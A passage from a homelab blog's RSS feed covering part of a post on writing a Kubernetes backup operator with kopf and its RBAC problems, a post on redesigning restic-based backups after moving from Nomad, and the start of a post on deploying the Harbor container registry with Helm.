</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Resume handler called with spec: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Resume handler called with status: </span><span style="color:#e6db74">{</span>status<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.update</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">update_handler</span>(spec, status, meta, diff, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Update handler called with meta: </span><span style="color:#e6db74">{</span>meta<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Update handler called with spec: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Update handler called with status: </span><span style="color:#e6db74">{</span>status<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Update handler called with diff: </span><span style="color:#e6db74">{</span>diff<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">@kopf.on.delete</span>(<span style="color:#e6db74">&#39;homelabbackupconfigs&#39;</span>)
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">delete_handler</span>(spec, status, meta, <span style="color:#f92672">**</span>kwargs):
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Delete handler called with meta: </span><span style="color:#e6db74">{</span>meta<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Delete handler called with spec: </span><span style="color:#e6db74">{</span>spec<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>    logging<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Delete handler called with status: </span><span style="color:#e6db74">{</span>status<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span></code></pre></div><p>The intention for this was merely to get a feeling for what I was actually
getting for each of the different events, and to play around with when each of
these handlers would be called.</p>
<p>For the first deployment, I launched kopf with the <code>-A</code> flag, which means it
will use the Kubernetes cluster APIs to watch every Namespace. As noted above,
I want every Namespace to be watched, as every one of them might contain a
HomelabServiceBackup object to take care of the backup for the service residing
in the Namespace.
But I started out with only the HomelabBackupConfig CRD defined, as that&rsquo;s the
first step in my implementation plan. The content of the CRD is not important
for now, I will show them in a later post when I&rsquo;ve actually got the implementation
ready.</p>
<p>I also needed to provide proper RBAC for the deployment, as the operator needs
access to the API server.
My thoughts went like this: For now, I only need the HomelabBackupConfig, and
I only need that in the same Namespace the operator is running in. So I created
the following Role:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo-role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">rules</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>: [<span style="color:#ae81ff">events]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>: [<span style="color:#ae81ff">create]</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;mei-home.net&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">homelabbackupconfigs</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">patch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">update</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">RoleBinding</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo-role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">roleRef</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apiGroup</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo-role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">subjects</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ServiceAccount</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo-account</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">backups</span>
</span></span></code></pre></div><p>This produced a number of errors when trying to launch my rudimentary operator:</p>
<pre tabindex="0"><code>[2024-05-12 14:19:55,454] kopf._core.reactor.o [ERROR   ]
Watcher for homelabbackupconfigs.v1alpha1.mei-home.net@none has failed:
&#39;homelabbackupconfigs.mei-home.net is forbidden: User &#34;system:serviceaccount:backups:hlbo-account&#34; cannot list resource &#34;homelabbackupconfigs&#34; in API group &#34;mei-home.net&#34; at the cluster scope&#39;
</code></pre><p>Okay, this seems reasonably clear to me. I&rsquo;ve only created a Role and done a
RoleBinding for the <code>backups</code> Namespace, where the operator resides.</p>
<p>I also tried another variant. Instead of using <code>-A</code> to have kopf use the cluster
API, one can provide <code>--namespace=*</code>. This tells kopf to use the namespaced API,
but list all Namespaces and watch them all. Then, I allowed kopf to list all
Namespaces. I kept only allowing it access to the HomelabBackupConfig in the
backups Namespace, though. This results in a lot of errors when it tries to
watch HomelabBackupConfigs in Namespaces other than backups, but the operator
keeps running. So this might a &ldquo;solution&rdquo;.</p>
<p>I could also return to using <code>-A</code> and just configure everything in a ClusterRole.
But that&rsquo;s just too many permissions that the operator doesn&rsquo;t need. And I need
to grant it access to the Jobs API, and I don&rsquo;t want to do that cluster-wide
either.</p>
<p>And finally, the individual handlers don&rsquo;t allow defining a Namespace to watch
a specific resource in. The only config is the command line flag, and that
applies for all resources and their handlers.</p>
<p>So it looks like I have to search for another framework, as kopf doesn&rsquo;t seem to
allow me to do things in the least-privilege way I want them done. &#x1f614;</p>
<p>If you&rsquo;ve got a good idea or you think I&rsquo;ve overlooked something, please feel
free to ping me on the <a href="https://social.mei-home.net/@mmeier">Fediverse</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 12: Backup Plan</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-12-backup-issues/</link>
      <pubDate>Sun, 05 May 2024 11:10:21 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-12-backup-issues/</guid>
      <description>It seems I need a new backup strategy</description>
      <content:encoded><![CDATA[<p>Wherein it seems I need a new backup strategy.</p>
<p>This is part 13 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>During the last week, I&rsquo;ve started to work on implementing my backup strategy
for the new Kubernetes cluster. The original plan was to stay with what I&rsquo;m already
doing in my Nomad cluster. But it turns out I can&rsquo;t, so I need a new strategy.</p>
<p>If you&rsquo;re prone to suffering from IT-related nightmares, you might wish to skip
this one. The Nomad backup implementation ain&rsquo;t pretty, and my current plans for
the k8s backup implementation ain&rsquo;t going to make it any prettier. You&rsquo;ve been
warned.</p>
<h2 id="speaking-of-backups">Speaking of backups</h2>
<p>You should do backups. They don&rsquo;t have to be perfect. As you will see in the
next section, mine definitely aren&rsquo;t. But they&rsquo;re serving me well.</p>
<p>I&rsquo;ve only ever needed backups once, right after I left university and my entire
life was stored on a single laptop&rsquo;s internal HDD - and that HDD failed. But:
I was lucky, in that I had backups of my <code>/home</code> directory only about 24h old.</p>
<p>So all good, you might think. But not really. You see, my backups were encrypted.
And now guess where the only copy of that decryption key was stored. Exactly.
I got pretty lucky again, in that I was able to read the key from the broken
disk. But these days, I&rsquo;ve got my keys stored in several places.</p>
<p>In fact, I went one more step: There&rsquo;s an unencrypted USB stick with a copy of
my password manager and PGP keys in a bank vault.
So don&rsquo;t forget to <em>separately</em> back up your backup&rsquo;s encryption key!</p>
<p>Generally, backups are supposed to be 3-2-1:</p>
<ul>
<li>Three different copies of your data</li>
<li>On two different kinds of media</li>
<li>With one copy off-site</li>
</ul>
<p>I do not have an off-site copy anywhere yet, safe for the aforementioned USB
stick with my unencrypted password manager.</p>
<p>And for me, the &ldquo;two different kinds of media&rdquo; isn&rsquo;t really two different kinds
of media. It&rsquo;s more like &ldquo;two independent systems&rdquo;, because even the data that&rsquo;s
really important to me is already too big to even store on multiple DVDs, which
is the only medium I would call &ldquo;sensible&rdquo; for a consumer.</p>
<p>What I do find important is incremental backups. Don&rsquo;t just override the previous
day&rsquo;s backup with the current one. Because incremental backups aren&rsquo;t to protect you
from faulty devices, but rather to protect you from yourself. This might be a
fat-fingered <code>rm -rf /</code>, or a ransomware infection. With incremental backups,
you can always go back.</p>
<p>My general strategy is:</p>
<ul>
<li>One yearly backup</li>
<li>One monthly backup for the past six month</li>
<li>One weekly backup for the past six weeks</li>
<li>A daily backup for the past seven days</li>
</ul>
<p>That should make sure that I can even recover from an accidental delete I
only realized I made a couple months later.</p>
<h2 id="the-current-state-of-backups-in-my-nomad-cluster">The current state of backups in my Nomad cluster</h2>
<p>The basis of my backups, both in my Homelab and for my other hosts, is
<a href="https://restic.net/">restic</a>. It&rsquo;s a CLI backup program which supports a wide
range of backup targets, encryption and incremental backups.</p>
<p>Restic then pushes all of those, both the data volumes from my Homelab services
and my <code>/home</code> dir from my workstation and laptop, into an S3 bucket on my Ceph
cluster, on a pool with two replicas. For the stuff coming from my workstation,
this is already an improvement, because the backup is stored on different disks
than the original data.
But it doesn&rsquo;t do very much for my Homelab data volumes, because those are all
located on that same Ceph cluster. The only advantage those backups bring is their
incremental nature, so if I accidentally delete a volume, I can still get the data
back.</p>
<p>The second part, which fulfills the &ldquo;two different types of media&rdquo; requirement
is a backup on an external HDD. This backup is a bit more selective than the
relatively broad restic backup, because that single external HDD isn&rsquo;t big
enough to hold all of my data. But it is easily big enough to hold all the data
I genuinely care about.</p>
<p>I&rsquo;m running both of those backup jobs through the Nomad cluster. The first
backup, dubbed my &ldquo;services backup&rdquo;, backs up the data volumes attached to my
Homelab services. The second one, called the &ldquo;external backup&rdquo;, takes a couple
of the S3 buckets used as targets in the services backup, and clones them onto
an external HDD.</p>
<h3 id="the-services-backup">The services backup</h3>
<p>The services backup is deployed in the Nomad cluster as a <a href="https://developer.hashicorp.com/nomad/docs/schedulers#system-batch">System Batch</a>
type job. These jobs are similar to Kubernete&rsquo;s DaemonSet, in that they run a
job instance on every host, but they are of the &ldquo;run-to-completion&rdquo; type, similar
to Kubernete&rsquo;s Job object, instead of expecting to start a daemon which stays
active on each node.</p>
<p>This job needs to be run in <em>privileged</em> mode, because it mounts the directory
where CSI drivers mount CSI volumes on the host into the job&rsquo;s container.</p>
<p>Yes, you read that right: On all my Nomad cluster hosts, every night, there runs
a container which mounts the mount directories of all mounted CSI volumes.</p>
<p>Once that&rsquo;s done, the container runs a small Python program I&rsquo;ve written to do
the actual backup.
It does roughly the following:</p>
<ol>
<li>Check which jobs are running on the current node</li>
<li>Check which volumes from those jobs are noted as needing backups in a config file</li>
<li>Run restic against those directories and push them into an S3 bucket on Ceph</li>
</ol>
<p>In addition, I&rsquo;m also using <a href="https://rclone.org/">rclone</a> to back up S3 buckets
from those apps which use them for storage. This, again, does not make the data
more resilient, but it is again protection against accidental bucket deletion
and similar things.</p>
<p>This approach has a number of downsides. First, it is not 100% reliable. I&rsquo;m
backing up the data from volumes while those volumes are mounted and used by
their services. I don&rsquo;t have too much of a problem with that, simply because the
data on disk does not change too much during the times when I run the backups.
But it is still something to consider.
In addition, the overall backup job setup is also not the safest from a security
point of view. I&rsquo;m taking the mounted data for all of my services and mount them
into a single container. At least from a data access standpoint, that container
is basically root on my cluster nodes and can access the data for all services
in the Homelab.</p>
<h3 id="the-external-disk-backup">The external disk backup</h3>
<p>The second part of the backup strategy is to take the backup repositories created
by the service backups described above, as well as the ones created by my host
backups, and cloning them onto an external HDD connected to one of my nodes. This
is also implemented as a Nomad job.</p>
<p>This job receives the <code>/dev</code> device for the USB external HDD, instead of receiving
the already mounted directory. This is another defense in depth, as it allows me
to mount the backup disk only when it is really needed/used, and not have it
mounted all the time. This is a small defense against both, encryption ransomware
and accidental deletion.</p>
<p>But it also has one downside: Security, again. To be allowed to call the <code>mount</code>
command in the container, I have to run it in privileged mode.</p>
<p>This job does not have to do anything fancy in the implementation itself. It
mounts the external HDD and then runs rclone on all of the backup S3 buckets
defined in the configuration file for the services backup, plus a couple of
additional buckets for e.g. my <code>/home</code> backups. All of those get cloned onto
the external HDD. Here, I&rsquo;m not using restic and incremental backups, simple
because the individual backup buckets already contain the incremental backups.</p>
<p>This part of the backup I had already transferred over to my Kubernetes cluster,
without much issue.</p>
<h2 id="the-issue-with-migrating-the-backups-to-the-k8s-cluster">The issue with migrating the backups to the k8s cluster</h2>
<p>My main issue came yesterday, when I started to plan the addition of the service
backup job to Kubernetes. The basic functionality seemed to be available. I
could just mount the <code>/var/lib/kubelet/plugins/kubernetes.io/csi/rook-ceph.rbd.csi.ceph.com</code>
directory into the container. That&rsquo;s the directory where the Ceph CSI plugin I
use to provide PersistentVolumes mounts the volumes.</p>
<p>But then I checked how to actually run the job. As noted above, I needed to
have a run-to-completion pod running on every host in the cluster. And it looks
like k8s just doesn&rsquo;t have anything equivalent to Nomad&rsquo;s System Batch type of
job.</p>
<p>So what to do instead? One option would be to change the small Python app I
wrote, so that it doesn&rsquo;t just run the current backup cycle and then exits,
but instead runs continuously. I could then put it into a <a href="https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/">DaemonSet</a>
on each k8s node. That would very likely have worked. But since my initial
tests with k8s back in August 2023, I had thought that I might implement a small
&ldquo;Homelab Backups&rdquo; operator.</p>
<h2 id="over-engineered-but-hopefully-fun">Over-engineered, but hopefully fun</h2>
<p>So if we take a hard look at my current setup for services and external backups,
there are a number of crutches in there. First of all, there&rsquo;s the sequencing
problem. The nightly external HDD backup job should only run when all of the
service backup jobs have done their work for the night. But I was never able to
come up with a good way to do that, so I settled for just launching the external
HDD backup an hour after the service backup job. Not very elegant, but worked
well enough.</p>
<p>Then there was the issue of the &ldquo;run the service job on every host&rdquo; approach.
This is a shotgun approach, and also not very explicit in its configs. It&rsquo;s very
possible that there was no job with backups even running on any given host, so
the service backup run on that host would have been a waste.</p>
<p>Finally, the backup configuration, namely which volumes and S3 buckets should
be backed up, was done in configuration files for the two backup jobs - not
the individual app&rsquo;s jobs. So when removing or adding an app, I always had to
remember that I needed to also update the config of the backup jobs.</p>
<p>The idea I came up with, which solves all of the issues above, is to implement
a &ldquo;Homelab Backup&rdquo; Kubernetes Operator. That operator would handle &ldquo;HomelabBackup&rdquo;
objects, which I could individually configure for each app I&rsquo;m running and which
needs backups. When I then remove the app, that manifest would also be removed
and the backup for that particular app would be stopped.</p>
<p>It might look something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nextcloud</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupBucket</span>: <span style="color:#ae81ff">my-nextcloud-backup-bucket</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;30 2 * * *&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumeClaims</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-nextcloud-pvc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">external</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">s3Buckets</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-nextcloud-data-bucket</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">external</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>This would allow the definition of PersistentVolumeClaims and S3 buckets to back
up, and also where to back them up to.</p>
<p>The operator would then not start one backup job for every node, but instead
launch one k8s Job workload per HomelabBackup object. I would also be able to
then watch those Jobs, and once they all finish one way or the other, I could
then launch the external backup Job right away, instead of waiting for an
arbitrary amount of time. I could now make the dependency explicit.</p>
<p>With the operator launching the jobs, I will also be able to launch the job on
the right node where the volume is currently mounted. This can be done by looking
at Kubernete&rsquo;s VolumeAttachment objects, that show on which node any given
volume is currently mounted.</p>
<p>I&rsquo;m also considering some scheduling, to make sure that on any given node,
there&rsquo;s only ever going to be a single Job running, because anything else would
likely tax my 1 Gbps network.</p>
<p>Looking around, I found the <a href="https://github.com/nolar/kopf">kopf</a> framework
for Kubernetes Operators in Python. This looks pretty well suited for my needs,
and Python is currently among my most familiar languages anyway. It would be nice
to go for Go instead, but I would first have to familiarize myself with the
language before I could write the operator. And the main goal here is still to
move forward with the k8s migration.</p>
<p>Overall, I&rsquo;m not actually too mad about this detour. It looks like it&rsquo;s going
to be an interesting dive into Kubernete&rsquo;s API and operator implementations,
and it&rsquo;s going to fix a couple of problems with my old backup implementation.
In the end, stuff like this is why I set the migration up in such a way that
I could do it iteratively, while both the Nomad and k8s clusters run side by
side.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 11: Container Registry with Harbor</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-11-harbor/</link>
      <pubDate>Sat, 27 Apr 2024 21:20:46 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-11-harbor/</guid>
      <description>Running harbor for internal images and as a proxy for external registries</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my internal container registry to Harbor.</p>
<p>This is part 12 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>Let&rsquo;s start by answering the obvious question: Why even have an internal
container registry? For me, there are two reasons:</p>
<ol>
<li>Some place to put my own container images</li>
<li>A cache for external images</li>
</ol>
<p>Most of my internal images are slightly changed external images. A prime example
is my Fluentd image. I&rsquo;ve extended the official image with a couple of additional
plugins. And I needed some place to store them.</p>
<p>My main reason for point 2) is to avoid waste. Why reach out to the Internet and
put additional unnecessary load on somebody else&rsquo;s infrastructure by pulling the
same image 12 times? It makes a lot more sense to me to only do that once and
then use an internal cache.
A secondary reason was of course the introduction of the DockerHub rate limit.
I tended to hit that pretty regularly, especially when I was working on my CI.</p>
<p>A tertiary reason is Deutsche Telekom. My ISP. A couple of years ago, they
tended to regularly get into peering battles with their tier 1 peering partners,
and consequently, you had some days where the entire US was connected down a
512 Kbps pipe. Or at least that was what it felt like. Pulling an image from
DockerHub ran with, I kid you not, 5 Kbps. Those days seem to be over, but I
still like to at least be able to use previously pulled images.</p>
<p>Finally, there might also be a speed advantage when pulling from a local cache
instead of reaching out to the Internet. But for me, that was never really a
consideration. I&rsquo;ve got a 1 Gbps LAN, and most of my storage runs off of a Ceph
cluster, with the Image cache running on my bulk storage HDDs. So there&rsquo;s really
not going to be that much gain.</p>
<p>In my Nomad cluster, I had set up two instances of Docker&rsquo;s official <a href="https://distribution.github.io/distribution/">registry</a>.
Hm, it is now called &ldquo;distribution&rdquo;? And seemingly under the CNCF?
Ah:</p>
<blockquote>
<p>Registry, the open source implementation for storing and distributing container images and other content, has been donated to the CNCF. Registry now goes under the name of Distribution, and the documentation has moved to&hellip;</p></blockquote>
<p>From the <a href="https://docs.docker.com/registry/">official docs on the Docker page</a>.</p>
<p>I chose registry back then because it looked like a pretty low powered solution.
For a GUI, I used <a href="https://github.com/Joxit/docker-registry-ui">docker-registry-ui</a>,
which I can warmly recommend.</p>
<p>But I also pretty much ran it as an open registry, which bothered me a bit. Plus,
I had looked a lot at <a href="https://goharbor.io/">Harbor</a>, but always found that it sounded a bit too much
oriented towards deployment in Kubernetes. And now that I&rsquo;m finally running
my own Kubernetes cluster, I decided to replace my two registry instances with
a single Harbor instance.</p>
<p>Another reason for wanting to look at Harbor was that I think at some point,
registry could only serve as a pull-through cache for DockerHub, but not for
other registries, e.g. <a href="quay.io">Quay.io</a>. But if I read <a href="https://distribution.github.io/distribution/recipes/mirror/">the docs</a>
right, it&rsquo;s now possible to mirror other registries with it as well.</p>
<p>There are other alternatives as well. The first one, <a href="https://jfrog.com/artifactory/">Artifactory</a>,
is out, because while I know that it would fulfill my needs, it is also what we
use at work. And there is no great love lost between me and Artifactory. It will
only get deployed in my Homelab over my dead, cold, decomposing body.</p>
<p>Then there&rsquo;s <a href="https://www.sonatype.com/products/sonatype-nexus-oss">Sonatype Nexus</a>.
But quite frankly: That always gave off pretty strong &ldquo;We&rsquo;re going to go source
available within the week&rdquo; vibes.</p>
<p>Finally, there&rsquo;s Gitea and their relatively recently introduced <a href="https://docs.gitea.com/usage/packages/overview">package management feature</a>, which also includes a container registry.
The main reason I did not go with this one is that it currently doesn&rsquo;t support
pull-through caches, although <a href="https://github.com/go-gitea/gitea/issues/21223">there&rsquo;s a feature request</a>.
In addition, I&rsquo;m still a big fan of running apps which do one thing well, instead
of everything somewhat decently. (He says, looking at his Nextcloud file sharing/note taking/calendar/contacts/bookmarks moloch &#x1f605;)</p>
<p>So Harbor it is. Let&rsquo;s dig into it.</p>
<h2 id="harbor-setup">Harbor setup</h2>
<p>To setup Harbor, I used the <a href="https://github.com/goharbor/harbor-helm">official Helm chart</a>.
It is perfectly workable, but has some quirks when it comes to secrets handling
I will go into detail about later.</p>
<p>Here is my <code>values.yaml</code> file for the chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">expose</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ingress</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tls</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">certSource</span>: <span style="color:#ae81ff">none</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">core</span>: <span style="color:#ae81ff">harbor.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">myentrypoint</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">harbor</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">externalURL</span>: <span style="color:#ae81ff">https://harbor.example.com</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ipFamily</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ipv6</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageChartStorage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">disableredirect</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">s3</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">my-harbor-rgw-secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">bucket</span>: <span style="color:#ae81ff">harbor-random-numbers-here</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regionendpoint</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-myobjectstorename.my-rook-cluster-namespace.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">v4auth</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">rootdirectory</span>: <span style="color:#ae81ff">/harbor</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">encrypt</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secure</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">logLevel</span>: <span style="color:#ae81ff">info</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">existingSecretAdminPassword</span>: <span style="color:#ae81ff">my-admin-secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">existingSecretAdminPasswordKey</span>: <span style="color:#ae81ff">mySecretsKey</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">existingSecretSecretKey</span>: <span style="color:#ae81ff">my-harbor-secret-key-secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">portal</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">core</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">jobservice</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">jobLoggers</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">database</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
